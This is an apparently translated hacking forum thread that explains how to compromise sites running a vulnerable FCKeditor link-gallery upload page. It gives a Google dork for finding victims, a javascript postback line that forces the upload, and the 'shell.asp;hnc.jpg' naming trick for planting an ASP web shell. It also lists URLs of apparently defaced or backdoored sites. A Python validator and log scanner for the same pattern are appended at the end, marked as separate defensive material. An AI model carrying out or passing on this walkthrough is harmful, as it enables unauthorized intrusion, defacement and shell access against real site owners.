hogyz Wrote: wait, everyone, I'm writing it in Notepad first
scan on Google
dork:
Code:
inurl:Fck/fcklinkgallery.aspx
or any dork you know
once you've got a victim
choose
Code:
File ( A File On Your Site )
there..
paste the following javascript
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
and just upload right away...
files that can be uploaded include:
*.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
*.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg, *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
you can also upload a shell
the way to do it is we manipulate the file's extension..
for example, to upload a shell
shell.asp
just edit it with Notepad
then there's no need to tinker with the shell
just save as right away
with the name shell.asp;hnc.jpg
there.. once that's done
just upload the file
once that's done, open the file at
Code:
pacth/portals/0/deface.asp;me.jpg
example result
http://fril.co.il/portals/0/ho1onk.txt
sorry if it's not quite satisfying.. :)
nice one, bro...
http://iaf-fai.org/portals/0/oemunix.asp;hnc.css
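Added example, not part of the original post or its replies: a defender-side check for the file name pattern the post describes (a script extension followed by ';' and an allowed extension), written as an upload allow-list validator plus a scan over web server log lines. The extension lists, function names and log lines are assumptions constructed for illustration.

```python
from urllib.parse import unquote
import re

# Assumed list of extensions a Windows web host may run as server-side script.
SCRIPT_EXTS = {"asp", "aspx", "asa", "cer", "ashx", "php"}
_EXT_BEFORE_SEMI = re.compile(r"\.([A-Za-z0-9]+);")

def hidden_script_ext(name):
    """Return the script extension placed before a ';' in name, else None."""
    for m in _EXT_BEFORE_SEMI.finditer(unquote(name)):
        if m.group(1).lower() in SCRIPT_EXTS:
            return m.group(1).lower()
    return None

def is_safe_upload_name(name, allowed):
    """Allow-list check: no ';', separators or NUL, and no script extension
    in any dot-separated segment; the final extension must be allowed."""
    decoded = unquote(name).lower()
    if any(c in decoded for c in ";:/\\\x00"):
        return False
    parts = decoded.split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        return False
    return parts[-1] in allowed

def flag_log_lines(lines):
    """Return (client_ip, uri) for W3C-style log lines requesting such a name."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            uri = row.get("cs-uri-stem", "")
            if hidden_script_ext(uri):
                hits.append((row.get("c-ip", "-"), uri))
    return hits

# Constructed sample log (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem c-ip sc-status",
    "2010-01-01 10:00:00 POST /Fck/fcklinkgallery.aspx 203.0.113.7 200",
    "2010-01-01 10:00:09 GET /portals/0/sample.asp;x.jpg 203.0.113.7 200",
    "2010-01-01 10:01:00 GET /portals/0/logo.jpg 198.51.100.4 200",
]

if __name__ == "__main__":
    print(flag_log_lines(SAMPLE_LOG))
    print(is_safe_upload_name("shell.asp;hnc.jpg", {"jpg", "png"}))
```

Storing uploads under a server-generated name in a directory with script execution disabled removes the dependence on file name parsing altogether.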